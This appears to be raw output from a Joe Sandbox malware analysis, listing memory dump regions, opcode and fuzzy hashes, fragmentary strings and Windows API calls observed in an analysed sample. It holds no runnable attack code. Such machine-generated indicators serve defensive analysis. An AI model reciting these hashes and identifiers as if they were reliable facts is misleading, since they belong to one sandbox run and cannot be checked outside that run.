                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ca24ebcc84215814b51d1e8086d48eb0ea281253c27442cf70da2ac2f1055e8a
                                                                                                                                      • Instruction ID: bdb1bd6946825ecd9a87401d01c037002aab1bd5bdf994474b6867d9356de7df
                                                                                                                                      • Opcode Fuzzy Hash: ca24ebcc84215814b51d1e8086d48eb0ea281253c27442cf70da2ac2f1055e8a
                                                                                                                                      • Instruction Fuzzy Hash: 94416771E016189FEB68CF6BD94479EFAF3AFC9300F14C1AAC40CA6264DB7409868F51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687533440.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_61c0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 700de664e29e6fc32d56402e3dce814766fb436ed3cf14acba5717b5445a87f1
                                                                                                                                      • Instruction ID: 7a2531248952a7d1cf34df811877865aaa9eed9c31070f61c29f5af64b8fe8c3
                                                                                                                                      • Opcode Fuzzy Hash: 700de664e29e6fc32d56402e3dce814766fb436ed3cf14acba5717b5445a87f1
                                                                                                                                      • Instruction Fuzzy Hash: 8A4166B1E016189BEB68CF6BC85479EFAF3AFC9200F14C1A9C40CA6254DB740A858F51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1d4a89a2c5873586cc6c1edf096f08831faf5ef1b42a991e7b1f3c27b34ce0fe
                                                                                                                                      • Instruction ID: a12cdbf6db6c2b80daf9a65c908da1a900f2cd40a9bd99d34953eb4156ebbe9c
                                                                                                                                      • Opcode Fuzzy Hash: 1d4a89a2c5873586cc6c1edf096f08831faf5ef1b42a991e7b1f3c27b34ce0fe
                                                                                                                                      • Instruction Fuzzy Hash: 59415871E016189BEB68CF5BC94479EFAF3AFC9304F14C1AAC50CA6264EB740A858F55
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6b9575ea8c32d48c8adc53858c5d0c6e0b0b4818b8d7afd4cbe3c9599dc381d6
                                                                                                                                      • Instruction ID: a6be7676ccf93aeb87eb0da4b5e7d680db2591d4c2a28381e4f2a095f5238309
                                                                                                                                      • Opcode Fuzzy Hash: 6b9575ea8c32d48c8adc53858c5d0c6e0b0b4818b8d7afd4cbe3c9599dc381d6
                                                                                                                                      • Instruction Fuzzy Hash: 9C41C274E012088BEB58DFAAD8547DDBBF6AF89300F14D02AC518AB298DB344946CF94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2b80acc5ceb52b039c8ab76702095af57faeae669458ce7d967e02535b87cc9f
                                                                                                                                      • Instruction ID: cdaf2ae3cf5958294e74c32cf5f896bc60d5bd5a51eff69697ffc0caffd30b08
                                                                                                                                      • Opcode Fuzzy Hash: 2b80acc5ceb52b039c8ab76702095af57faeae669458ce7d967e02535b87cc9f
                                                                                                                                      • Instruction Fuzzy Hash: ED410374E002188BEB58DFAAD85479EBBF2BF89300F60C06AD418BB354DB354946CF54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687533440.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_61c0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3bc56f2f8b0d04253727280ea516021899163907d041aac25b7cf5f1e168da2d
                                                                                                                                      • Instruction ID: 07bdacec63d67d2ba9fe009eeb38a4c8cd834bbd9c59c0bd9af2c3648eb4a7d0
                                                                                                                                      • Opcode Fuzzy Hash: 3bc56f2f8b0d04253727280ea516021899163907d041aac25b7cf5f1e168da2d
                                                                                                                                      • Instruction Fuzzy Hash: EF41F1B4D00248CFDB58CFAAD5546EDFBF2AF88300F249029C454AB399EB354A06CF44
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                      • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 065DB646
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 065DB683
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 065DB6C0
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 065DB719
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 065DB646
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 065DB683
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 065DB6C0
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 065DB719
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (q$(q$xq$xq
                                                                                                                                      • API String ID: 0-4001314665
                                                                                                                                      • Opcode ID: 0720819f678f389f1731456b36ace3f25fa0bc3caa5b7074a81396e279333f7b
                                                                                                                                      • Instruction ID: 550b0669124bc1da01965e91c559b308ccb905b967474375791351b5f89df68e
                                                                                                                                      • Opcode Fuzzy Hash: 0720819f678f389f1731456b36ace3f25fa0bc3caa5b7074a81396e279333f7b
                                                                                                                                      • Instruction Fuzzy Hash: 1E619D317002049FDB599F24C854BAEBBA2AFC4310F14846DE81A9F3A5DB36EC47CB91

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$;q
                                                                                                                                      • API String ID: 0-144927120
                                                                                                                                      • Opcode ID: 64caf6732ec3740eb76e96aa003dcfc182af2e69e570fcc1cb8a92b52722aff1
                                                                                                                                      • Instruction ID: 838e77743989452de7de7e847580d7e412af28d530b26b177612cb2e1c8a92d2
                                                                                                                                      • Opcode Fuzzy Hash: 64caf6732ec3740eb76e96aa003dcfc182af2e69e570fcc1cb8a92b52722aff1
                                                                                                                                      • Instruction Fuzzy Hash: E3F18F303842018FDB299F39C86CB3D779AAF84645F1A44AAE456CF3A5DB36CC61C791
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $q$$q
                                                                                                                                      • API String ID: 0-3126353813
                                                                                                                                      • Opcode ID: 1778a22a75eaca6cdec39a20838952c28713faa1628677a2753991f315ec41a7
                                                                                                                                      • Instruction ID: c61354dc097ad9b72e4c4157202163545fd85ae1a7aa114b8f48f4ff427189da
                                                                                                                                      • Opcode Fuzzy Hash: 1778a22a75eaca6cdec39a20838952c28713faa1628677a2753991f315ec41a7
                                                                                                                                      • Instruction Fuzzy Hash: D352C034E002198FEB649BA4C854BAEBB72FF88300F1081A9D50BAB795DF355E46DF51
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Hq$Hq
                                                                                                                                      • API String ID: 0-925789375
                                                                                                                                      • Opcode ID: 719d80595fceeed95464233b00ff938811b029c0502a38dcc3f7ee560e028323
                                                                                                                                      • Instruction ID: 012d53ac0ffcf2e96acda2c4177b8497fdb8fa331b5cd439552cdc1cbc970d20
                                                                                                                                      • Opcode Fuzzy Hash: 719d80595fceeed95464233b00ff938811b029c0502a38dcc3f7ee560e028323
                                                                                                                                      • Instruction Fuzzy Hash: 79B1CC307442948FDB199F38D85CB7E7BAAAFC8244F158929E406CB295CB78CC62C795
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,q$,q
                                                                                                                                      • API String ID: 0-1667412543
                                                                                                                                      • Opcode ID: 4445f9b3db9e2aa1f96817e2bdd40a192be3b993d5cf2c84c04a92fe2c9dd481
                                                                                                                                      • Instruction ID: bb65f942ced697fc4222d78a40e6d36456a0cbf824d07e424d96bc60e8acc412
                                                                                                                                      • Opcode Fuzzy Hash: 4445f9b3db9e2aa1f96817e2bdd40a192be3b993d5cf2c84c04a92fe2c9dd481
                                                                                                                                      • Instruction Fuzzy Hash: B081E030B40146DFCB28CF69C888A7DBBBAFF88305B158169D415EB364DB39E851CB91
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (&q$(q
                                                                                                                                      • API String ID: 0-2464455664
                                                                                                                                      • Opcode ID: f0104dbc99c4e12996ddfb4250c455e9d6223732555a5bc77654b232a2b1a43b
                                                                                                                                      • Instruction ID: 9ec503c859b820cf6cd18130c667f84d876bcaa8eff7702195a2b513bcd47132
                                                                                                                                      • Opcode Fuzzy Hash: f0104dbc99c4e12996ddfb4250c455e9d6223732555a5bc77654b232a2b1a43b
                                                                                                                                      • Instruction Fuzzy Hash: 50719F31F002198FDB19DFA9D8506EEBBF2AFC9700F149129E506AB380DE349D46C7A5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: E$LRq
                                                                                                                                      • API String ID: 0-865280463
                                                                                                                                      • Opcode ID: 5e591a7d5c1f7d5334e0c9afb6321d78f305e3674bc3043593f7d89b7211b16e
                                                                                                                                      • Instruction ID: 9eb1c130da04e2a84494a1113531a71cd16c3302d0fbba228563302036fe3722
                                                                                                                                      • Opcode Fuzzy Hash: 5e591a7d5c1f7d5334e0c9afb6321d78f305e3674bc3043593f7d89b7211b16e
                                                                                                                                      • Instruction Fuzzy Hash: 4B518E74F001058FCB94EF78D894A6E7BF2BF89200B14856AE416DF360EA34DC06CB91
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LRq
                                                                                                                                      • API String ID: 0-3187445251
                                                                                                                                      • Opcode ID: 034c5441bb7abb97e78b535beadd9ab8c7d294cd3123918da4168119c15da378
                                                                                                                                      • Instruction ID: ac4901694245576cc1a1cde4a032101956248dba0001d7a007a86031334c0f5e
                                                                                                                                      • Opcode Fuzzy Hash: 034c5441bb7abb97e78b535beadd9ab8c7d294cd3123918da4168119c15da378
                                                                                                                                      • Instruction Fuzzy Hash: 3752DA34E00219CFCB54EF64E998A9DBBB2FB49301F1059A5D40AB7369DB302D8ADF44
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LRq
                                                                                                                                      • API String ID: 0-3187445251
                                                                                                                                      • Opcode ID: a333b257cb21696708a8161a3a9cc953cadecd74f5968f94cf9bf72a4538c02d
                                                                                                                                      • Instruction ID: 2fadbeafe675053ea3c928f7e0da190f64b7275e89481a70d2757279a0cb266a
                                                                                                                                      • Opcode Fuzzy Hash: a333b257cb21696708a8161a3a9cc953cadecd74f5968f94cf9bf72a4538c02d
                                                                                                                                      • Instruction Fuzzy Hash: D752DA34E40219CFCB54EF64E998A9DBBB2FB49301F1059A5D40AB7329DB302D8ADF44
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 070A4746
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3690011982.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_70a0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                      • Opcode ID: be755c3af96fc4af2a3701143f4478b5d192fe7473a63c2780f279a26486da8b
                                                                                                                                      • Instruction ID: 07b21b41bf34be19bc0f28ef512df0a8d8a1ebdec6a35afb743b03c5fb5541f4
                                                                                                                                      • Opcode Fuzzy Hash: be755c3af96fc4af2a3701143f4478b5d192fe7473a63c2780f279a26486da8b
                                                                                                                                      • Instruction Fuzzy Hash: 1D8168B4A00B469FDB64DF6AD44179ABBF1FF88300F008A2DE496D7A50D774E909CB91
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 070A67E2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3690011982.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_70a0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                      • Opcode ID: 8c033edca0c5654588c21aca481080389ed2961fd6953a4c07712fcfefac08bd
                                                                                                                                      • Instruction ID: 0ff582880bea4350377a1e0da3f2b3c5ddfb722ce12e746881f68011ba09cba9
                                                                                                                                      • Opcode Fuzzy Hash: 8c033edca0c5654588c21aca481080389ed2961fd6953a4c07712fcfefac08bd
                                                                                                                                      • Instruction Fuzzy Hash: 9451C2B5D10349EFDB14CFA9D884ADEBBF5BF48310F24822AE419AB250D7719845CF90
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 070A67E2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3690011982.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_70a0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                      • Opcode ID: b697949ae52fc78d0de9a9e55b382e312a20e5990e8a0a7bceda18839f4ed8de
                                                                                                                                      • Instruction ID: 69343b7fda5df95f4ba2f31b131e16b28bcedc545d44dd354444abf417029e33
                                                                                                                                      • Opcode Fuzzy Hash: b697949ae52fc78d0de9a9e55b382e312a20e5990e8a0a7bceda18839f4ed8de
                                                                                                                                      • Instruction Fuzzy Hash: 7841A2B1D10349EFDB14CF99C884ADEBBF5BF48310F64822AE819AB250DB759845CF90
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065DB897
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: f86df486b6bdbd1ee0d7a2798f6f1430dc42d13e18126324a5bffd79972eb5e0
                                                                                                                                      • Instruction ID: 7b16f57832313224c258b0eac3e6ee6ef7bf49c292196c1b1d3a4d46cf1dd75d
                                                                                                                                      • Opcode Fuzzy Hash: f86df486b6bdbd1ee0d7a2798f6f1430dc42d13e18126324a5bffd79972eb5e0
                                                                                                                                      • Instruction Fuzzy Hash: 6A414AB6900249AFDF10CF99D844AEEBFF9FB48310F15801AE954A7350C7359951DFA4
                                                                                                                                      APIs
                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 070A8ED1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3690011982.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_70a0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                      • Opcode ID: f55a70da30e16e3195fce651f81290b1e2642018e0c84a375c3bd2808699706d
                                                                                                                                      • Instruction ID: 55c68fe91416f187101b84409dcda3980a4e48b13f724900bf1f073b3156ef21
                                                                                                                                      • Opcode Fuzzy Hash: f55a70da30e16e3195fce651f81290b1e2642018e0c84a375c3bd2808699706d
                                                                                                                                      • Instruction Fuzzy Hash: 714147B490030ADFCB14DF99C888AAAFBF5FB88314F24C559D519AB361C774A841CFA0
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065DB897
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: 64a853f417d3f9b1117ffca1808d0ff410404b41784b32b93e551c2cebf8c931
                                                                                                                                      • Instruction ID: c08b30a19ff8286f11404061a4268afb95aada2fdb5a4b0425c0d08bf26a8774
                                                                                                                                      • Opcode Fuzzy Hash: 64a853f417d3f9b1117ffca1808d0ff410404b41784b32b93e551c2cebf8c931
                                                                                                                                      • Instruction Fuzzy Hash: C421C4B5D002499FDB10CF9AD984ADEBBF5FB48310F14841AE918A3350D774A945CF65
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 061C9AA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687533440.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_61c0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 399f815791963ec1a74e85c4ea39848b343c48be1bef92dc2b667fce7235ec77
                                                                                                                                      • Instruction ID: 262989de1c6456673f57c07f8d8ce54a86bc410b89e430d5d708001b87105cd0
                                                                                                                                      • Opcode Fuzzy Hash: 399f815791963ec1a74e85c4ea39848b343c48be1bef92dc2b667fce7235ec77
                                                                                                                                      • Instruction Fuzzy Hash: B31159B4E002099FEB44CBA9D884AADB7B5BF88324F148969E844E7355D731EC41CB64
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 070A4746
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3690011982.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_70a0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4139908857-0
